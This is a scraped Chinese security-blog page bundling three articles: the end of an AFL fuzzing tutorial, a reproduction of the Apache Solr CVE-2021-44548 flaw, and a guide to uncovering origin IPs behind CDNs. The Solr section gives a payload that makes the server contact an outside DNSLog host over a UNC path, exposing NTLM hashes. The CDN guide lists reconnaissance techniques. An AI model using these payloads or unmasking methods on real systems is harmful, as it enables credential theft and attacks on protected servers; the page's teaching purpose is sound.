这里挑选的字符主要来源自各种jpeg的开头部分　之后如果要使用字典需要使用-x参数进行指定字典文件　https://paper.seebug.org/496/#dictionary 　4.语料库蒸馏　afl-cmin的核心思想是：尝试找到与语料库全集具有相同覆盖范围的最小子集。举个例子，假设有多个文件，都覆盖了相同的代码，那么就丢掉多余的文件。　最后只留下一个文件　afl-tmin（减小单个输入文件的大小）　afl-tmin有两种工作模式，　instrumented mode和crash mode。默认的工作方式是instrumented mode 　后面查资料得到tmin只能处理文件，文件夹需要修改脚本　精简到0bytes,后面在网上看到了相似的例子，这和tmin的精简策略有关，确实存在这种情况。　如果加上了参数-x，就会调用crash mode模式，会把导致程序非正常退出的文件直接剔除。这里测试的样例并没有crash例子，所以不进行测试。　5.持久模式　在持久模式下，AFL 仅模糊部分程序，而不是整个程序。当只想模糊复杂软件中的特定功能时，这很有用。与分叉服务器模式相比，这提供了许多速度改进。　具体例子如下：　对想要进行的部分进行修改　此时修改的文件是turbojpeg.c 　再修改cmakelist.txt如下　之后对库进行重新编译　编译方式　再进行afl-fuzz(与之前一致) 　速度上确实比之前的速度要快，最快时比之前要快上俩倍多　6.Afl-cov使用　可以快速帮助我们调用lcov和gcov处理来自afl-fuzz测试用例的代码覆盖率结果　安装　GCOV，它随gcc一起发布，所以不需要再单独安装，和afl-gcc插桩编译的原理一样，gcc编译时生成插桩的程序，用于在执行时生成代码覆盖率信息　LCOV，它是GCOV的图形前端，可以收集多个源文件的gcov数据，并创建包含使用覆盖率信息注释的源代码HTML页面。　这里也可以使用apt-install afl-cov来安装，不过看网上建议这个版本实际使用上会有问题，所以这里还是直接下载源码　为了实现检查覆盖率需要修改cmakelist.txt如下　再次编译库　编译文件　这里的afl-cov选择实时监控也就是添加--live，先启动afl-cov,后启动afl-fuzz，当afl-fuzz退出时，afl-cov就会跟着退出　启动afl-cov的命令　/home/user/Desktop/afl-cov/afl-cov -d afl-cc --live --enable-branch-coverage -c . -e "cat AFL_FILE | ./ttt AFL_FILE" --overwrite 　-d是之后afl-fuzz的输出文件，-c是直向源码文件的，在编译.c文件后，会生成一个.gno文件，-c 后面跟该文件的目录　启动afl-fuzz（与之前一致）　Afl-fuzz退出后，afl-cov需要等一会才能正常退出，此时就可以看见生成分析的网页了　也可以针对已经生成的数据直接开启afl-cov,但要求编译已经加上了-fprofile-arcs -ftest-coverage 　网页首页　也可以进入到文件里，查看具体语句的执行次数　7.afl_postprocess使用　它最主要的作用就是可以规定生成种子的格式　作者在github上的样例的作用是让每个测试用例开头的标头都是GIF89a 　https://github.com/mirrorer/afl/blob/master/experimental/post_library/post_library.so.c 　编译方法　gcc -shared -wall -O3 post_library.so.c -o post_library.so 　可以看看afl-fuzz.c对该方法的支持　获取AFL_POST_LIBRARY环境变量的值，自动加载afl_postprocess函数　这里推荐使用export设定环境变量，需要说明的是export的环境变量只在当前的shell（BASH）或其子shell（BASH）下是有效的，shell关闭了，变量也就失效了，再打开新shell时就没有这个变量，需要使用的话还需要重新定义。如果需要一直使用，需要修改配置文件，方法推荐　https://blog.csdn.net/wx_it/article/details/118450790 　加载后处理器库成功　也可以看到我们的测试样例变成了GIF格式，后处理库有效。　测试其他的例子　这部分需要注意的是对源码的处理，确保样例格式的满足输入的要求　参考资料 file:///C:/Users/antvsion/Desktop/AFL--%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E4%BD%BF%E7%94%A8%E6%B5%85%E6%9E%90.html#0https://paper.seebug.org/841/https://paper.seebug.org/842/ https://securitylab.github.com/research/fuzzing-challenges-solutions-1/ https://securitylab.github.com/research/fuzzing-sof 　实验推荐　实验：Fuzz之AFL（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ce=7ffeb07e-680b-4490-8667-cf66b362635c>>

协议层安全相关《http请求走私与CTF利用》

CVE-2021-44548 Apache Solr 敏感信息泄露漏洞分析及复现

前言　由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。　如果文章中的漏洞出现敏感内容产生了部分影响，请及时联系作者，望谅解。　一、漏洞原理　漏洞简述　Apache Solr是一个开源的搜索服务，使用Java语言开发，主要基于HTTP和Apache Lucene实现的。　2021年12月18日，Apache发布安全公告，Apache Solr中存在一个信息泄露漏洞（CVE-2021-44548），该漏洞影响了8.11.1之前的所有Apache Solr版本（仅影响Windows平台）。Apache Solr的DataImportHandler中存在一个不正确的输入验证漏洞，可利用Windows UNC路径从Solr主机调用网络上的另一台主机的SMB服务，或导致SMB攻击，从而造成：敏感数据泄露，如系统用户哈希（NTLM/LM哈希）；在系统配置错误的情况下，SMB中继攻击可能导致用户在SMB共享中被冒充，或导致远程代码执行。　漏洞分析　根据抓包内容中请求URL参数，以及solrconfig.xml中可以看到　漏洞点出于DataImportHandler#handleRequestBody 　如果传入的command=show-config并且传入config不为空则有一个openResource操作，且参数可控　看到solr-core-8.11.0.jar!\org\apache\solr\core\SolrResourceLoader.openResource this.getInstancePath()得到的路径为D:\Apache_Solr\solr-8.11.0\server\solr\core1 　再执行resolve("conf")变成，D:\Apache_Solr\solr-8.11.0\server\solr\core1\conf 　再执行resolve(resource)时，这里的WindowsPathType变成了UNC 　resolve逻辑判断WindowsPathType是否为绝对路径或UNC路径，是则直接返回参数　resource以\\开头就能使inConfigDir完全可控，在Files.exists中就会去请求windows的unc路径　二、漏洞复现实战　影响版本　Apache Solr < 8.11.1 （仅Windows）　环境搭建　Solr漏洞环境下载地址：　https://archive.apache.org/dist/lucene/solr/8.11.0/solr-8.11.0.zip 　1）打开命令行，进入bin目录下，运行solr.cmd start 　2）再另一个命令行面板中执行solr.cmd create_core -c new_core 　3）然后在solr-8.11.0\dist目录中添加三个jar包：　4）在solr-8.11.0\server\solr\core1\conf\solrconfig.xml中添加DataImportHandler路由　5）在C:\Users\Administrator\Downloads\solr-8.11.0\server\solr\core1\conf目录下新建data-config.xml文件，内容如下： <dataConfig> <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver" convertType="true" url="jdbc:mysql://IP:Port/test" user="XXXX" password="XXXX"/> <document> <entity name="entity" query="SELECT id, title, content, tags FROM test_table" > </entity> </document> </dataConfig> 　6）重新启动solr 　漏洞复现　进入Solr后台，选择core为我们新配置的core。　选择Dataimport，查看Configuration，可以看到我们新配置的data-config的详细信息　我们点击reload并抓包　查看包内容，可以看到请求如下：　URL参数添加参数，构造payload 　payload：http://localhost:8983/solr/core1/dataimport?command=show-config&config=&\\xxx\xxx 　我们添加&expandMacros=false&config=\hdlr07.dnslog.cn\aaa，发送请求：　在DNSLog上可以看到收到请求　漏洞修复　目前此漏洞已经修复，建议受影响用户升级到Apache Solr 8.11.1。　下载链接：　https://solr.apache.org/downloads.html 　缓解措施：　确保只有受信任的客户端才能向Solr的DataImporthandler发出请求　结束语　本文主要介绍了CVE-2021-44548 Apache Solr 敏感信息泄露漏洞的原理分析及复现过程，漏洞主要利用DataImportHandler存在输入验证缺陷，最终利用SMB服务导致敏感信息泄露。

CDN绕过技术总汇

近日HVV培训以及面试，有人问了CDN该如何绕过找到目标真实IP，这向来是个老生常谈的问题，而且网上大多都有，但是有些不够全面，今天把绕过CDN全理一理。术语叫做“深入浅出”。　CDN简介　定义　内容分发网络（英语：Content Delivery Network或Content Distribution Network，缩写：CDN）是指一种透过https://zh.wikipedia.org/wiki/%E4%BA%92%E8%81%AF%E7%B6%B2互相连接的电脑网络系统，利用最靠近每位用户的服务器，更快、更可靠地将音乐、图片、视频、应用程序及其他文件发送给用户，来提供高性能、可扩展性及低成本的网络内容传递给用户。　CDN是利用缓存技术，解决如何将数据快速可靠从源站传递到用户的问题。用户获取数据时，不需要直接从源站获取，通过CDN分发，用户可以从一个较优的服务器获取数据，从而达到快速访问，并减少源站负载压力的目的（负载均衡）　工作过程用户在浏览器输入域名，先向DNS服务器发送请求 DNS服务器将域名解析权交（通过CNAME）给CDN专用DNS服务器客户端根据返回的ip访问CDN负载均衡设备负载均衡设备根据当前的负载情况和用户所需内容，返回合适的ip 客户端最后根据ip访问对应的CDN缓存服务器　优点缓解原服务器访问压力解决互联互通难题解决网站突发流量的问题合理利用互联网资源全面预防单点故障改善用户的访问的质量和体验提供全面、准确、和详细的数据统计有效的防治黑客攻击源站 ...... 　适用范围　一般来说以资讯、内容等为主的网站，具有一定访问体量的网站静态内容（html、js、css、image等，如图床）视音频、大文件下载，分发加速：哔哩哔哩、腾讯等视频，百度云盘、蓝奏云等视频直播加速：斗鱼、淘宝、虎牙直播移动应用加速：移动app内图片、页面、短视频、UGC等内容，小程序等　像直播这一类必有CDN，因为一个网站直播流涌入大量用户，现在任何一家直播平台都没有直接负载的服务器能力。看直播再快的网速都有一定延迟的原因之一就是，需要在CDN里缓存一部分，用户从CDN里观看。　判断是否存在CDN 　方法一：PingPingPing 　不同地区对应着不同的CDN中心，所以使用不同站点的ping服务可分配到不同的CDN。这很简单，使用各种多站点ping服务来检查对应的IP地址是否唯一。如果不是唯一的，则使用大多数 CDN。多站Ping网站为：　http://ping.chinaz.com/http://ping.aizhan.com/http://tools.ipip.net/ping.php （强烈推荐这个，这个默认多站ping，真的很多）　方法二：nslookup 　使用 nslookup 进行检测，原理同上，如果返回域名解析对应多个 IP 地址多半是使用了 CDN。　有 CDN 的示例： > ctfking.com 服务器: public1.alidns.com Address: 223.5.5.5 非权威应答: 名称: d831e3eec87f7d3c02a6-mini-l2.qcloudzygj.com Addresses: 106.55.85.170 106.55.85.167 106.55.86.71 Aliases: ctfking.com d14ca549ac628ef817e7beaa5095976f.qcloudwzgj.com 　无CDN的示例： > nbufe.edu.cn 服务器: public1.alidns.com Address: 223.5.5.5 名称: nbufe.edu.cn 　方法三：工具　https://www.cdnplanet.com/tools/cdnfinder/ 　CDN绕过　方法一：查询DNS解析记录　1.查看IP与域名绑定的历史记录。使用 CDN 之前可能有记录。相关查询网站为：　https://dnsdb.io/zh-cn/ 　https://x.threatbook.cn/ 　https://sitereport.netcraft.com/ 　https://tools.ipip.net/cdn.php（没错又是这个网站，它太猛了）　2.借助Securitytrails平台（https://securitytrails.com/）　攻击者可以查明真实的原始IP。他们只需在搜索字段中输入站点域名并按 ENTER，即可在左侧菜单中找到“历史数据”。　如何找到隐藏在 CloudFlare 或 Tor 背后的真实原始 IP？　除了过去的 DNS 记录，即使是当前的记录也可能泄露原始服务器 IP。例如，MX 记录是查找 IP 的常用方法。如果网站在与 Web 相同的服务器和 IP 上托管自己的邮件服务器，则原始服务器 IP 将在 MX 记录中。　方法二：查询子域名　毕竟CDN还是不便宜，所以很多站长可能只会在主站或者流量大的子站做一个CDN，而很多小站子站跟主站在同一个服务器或者同C段，此时可以通过子域对应的IP查询，帮助找到真实IP站点。 https://x.threatbook.cn/上面提到的微步在线功能强大，黑客只需输入域名即可查找（如baidu.com），点击子域选项即可找到其子域，但免费用户每月只有5次免费查询机会。 https://dnsdb.io/zh-cn/黑客只需要输入baidu.com TYPE:A就可以收集到百度的子域名和IP。 https://www.google.com/谷歌站点：baidu.com-www 可以看到除WWW以外的子域子域扫描器 Layer子域名挖掘机和lijiejie的subdomain那个工具都很不错推荐长亭的xray 　方法三：网络空间引擎　fofa、鹰图、Zoomeye、shodan、360 　推荐鹰图　只需输入：title:“网站的title关键字”或者body：“网站的body特征”就可以找出收录的有这些关键字的ip域名，很多时候能获取网站的真实ip 　方法四：使用SSL证书寻找真实原IP 　如果您在 xyz123boot.com 上托管服务，则原始服务器 IP 为 136.23.63.44。CloudFlare 将为您提供 DDoS 防护、Web 应用防火墙和其他一些https://www.webshell.cc/tag/security服务，以保护您的服务免受攻击。为此，您的 Web 服务器必须支持 SSL 并具有证书。此时，CloudFlare 与您的服务器之间的通信，就像您与 CloudFlare 之间的通信一样，将被加密（即没有灵活的 SSL）。这看起来很安全，但问题是当你直接连接到443端口（https://136.23.63.44:443）上的IP时，会暴露SSL证　此时，如果攻击者扫描0.0.0.0/0，整个互联网，就可以在xyz123boot.com的443端口获取有效证书，进而获取提供给你的web服务器IP。　目前，Censys 工具可以扫描整个互联网。Censys 是用于搜索联网设备信息的新搜索引擎。安全专家可以使用它来评估其实施的安全性，黑客可以使用它作为初步调查。攻击目标和收集目标信息的强大武器。Censys 搜索引擎可以扫描整个互联网。Censys每天扫描IPv4地址空间，搜索所有联网设备并收集相关信息，并返回资源（如设备、网站、证书等）配置和部署的整体报告。　攻击者唯一需要做的就是将上述搜索词转换为实际的搜索查询参数。　xyz123boot.com证书的搜索查询参数为：parsed.names: xyz123boot.com 　只显示有效证书的查询参数为：tags.raw:trusted 　攻击者可以在 Censys 上实现多个参数的组合，这可以通过使用简单的布尔逻辑来完成。　组合的搜索参数是：parsed.names：xyz123boot.com 和 tags.raw：trusted 　Censys 将向您显示在扫描中找到的符合上述搜索条件的所有标准证书。　要一一查看这些搜索结果，攻击者可以通过单击右侧的“探索”来打开一个包含多个工具的下拉菜单。什么在使用这个证书？> IPv4 主机　使用给定的 SSL 证书　如果您是执法人员，并且想找到隐藏在 cheesecp5vaogohv.onion 下的儿童色情网站。最好的办法是找到它的原始IP，这样就可以追踪它的托管服务器，甚至可以找出它背后的运营商和财务线索。　隐藏服务具有 SSL 证书。要查找它使用的 IPv4 主机，只需将“SHA1 指纹”（签名证书的 sha1 值）粘贴到 Censys IPv4 主机搜索中即可找到证书。这种方法很容易找到配置错误的Web服务器。　方法五：使用HTTP头找到真正的原始IP 　借助 SecurityTrails 这样的平台，任何人都可以在海量的大数据中搜索自己的目标，甚至可以通过比较 HTTP 标头找到原始服务器。　特别是当用户有一个非常特殊的服务器名称和软件名称时，攻击者更容易找到你。　如果要搜索的数据很多，如上所述，攻击者可以在 Censys 上组合搜索参数。假设您正在与 1500 个 Web 服务器共享您的服务器 HTTP 标头，所有这些服务器都发送相同的标头参数和值组合。而且您还使用新的 PHP 框架来发送唯一的 HTTP 标头（例如：X-Generated-Via: XYZ 框架），目前约有 400 位网站管理员使用该框架。最终，在三台服务器的交汇处，通过人工操作即可找到IP，整个过程仅需几秒。　例如，Censys上用于匹配服务器头的搜索参数为80.http.get.headers.server:，查找CloudFlare服务的网站的参数如下：　80.http.get.headers.server:cloudflare 　方法六：利用网站返回的内容寻找真实的原IP 　如果原服务器IP也返回网站内容，可以在网上搜索很多相关资料。　浏览网站源代码以查找独特的代码片段。在 JavaScript 中使用具有访问权限或标识符参数的第三方服务（例如 Google Analytics、reCAPTCHA）是攻击者经常使用的一种方法。　以下是从 HackTheBox 网站获得的 Google Analytics 跟踪代码示例：　ga('创建','UA-93577176-1','auto');80.http.get.body 可以使用：参数通过body/source过滤Censys数据。不幸的是，普通搜索字段有局限性。但是您可以在 Censys 请求研究访问权限，这使您可以通过 Google BigQuery 进行更强大的查询。　Shodan 是一个类似于 Censys 的服务，同样提供 http.html 搜索参数。　搜索示例：https://www.shodan.io/search?query=http.html%3AUA-32023260-1 　方法七：使用外地主机解析域名　国内很多CDN厂商因为各种原因只做国内线，国外线路可能几乎没有。这时候我们可能会使用外地主机直接访问真实IP。　方法八：网站漏洞搜索目标敏感文件泄露，如phpinfo、GitHub信息泄露等探针 XSS盲打、命令执行反向shell、SSRF等无论是社会工程还是其他手段，目标网站获取CDN中的管理员账号，在CDN的配置中可以找到网站的真实IP。　方法九：网站邮件订阅搜索　RSS邮件订阅，很多网站都有自己的sendmail，会发邮件给我们。此时，服务器的真实IP将包含在邮件的源代码中。　方法十：用Zmap扫描全网　要找到xiaix.me网站的真实IP，我们首先从apnic获取IP段，然后使用Zmap的banner-grab扫描出开放80端口的主机进行banner抓包，最后在Host中写入xiaix.me http请求。　方法十一：F5 LTM解码方法　服务器使用F5 LTM进行负载均衡时，也可以通过set-cookie关键字解码得到真实ip，例如：Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000，第一个小数部分的十进制数是487098378取出来，然后转换成十六进制数1d08880a，然后从后往前，取出四位数字，就是0a.88.08.1d，最后再转换成十进制数10.136.8.29，也是最后一个真实IP。　方法十二：网页敏感信息　这条思路来源于Jacko 　favicon哈希值　根据网站图标哈希值搜索IP 　python2脚本 import mmh3 import requests response = requests.get('https://example.com/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print 'http.favicon.hash:'+str(hash) 　去fofa或者shodan上搜索该哈希值　查询格式： fofa：icon_hash="xxx" shodan：http.favicon.hash:xxx 　HTML源代码检索查找IP 　根据网站页面HTML中特有的字符串去搜索引擎中搜索，如目标页面中由HTML标签为<title>的字段比较特殊，那么可以去FOFA中搜索： title="xxxxxxxxxxxxxxx" 　搜索到的结果会显示IP，访问该IP，若能够正常访问则为真正IP，如果打不开则为CDN或虚拟主机服务器　参考文章： https://www.wolai.com/3xXwCoP1KEgkWWG8bnnianhttps://www.codetd.com/en/article/12945130

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页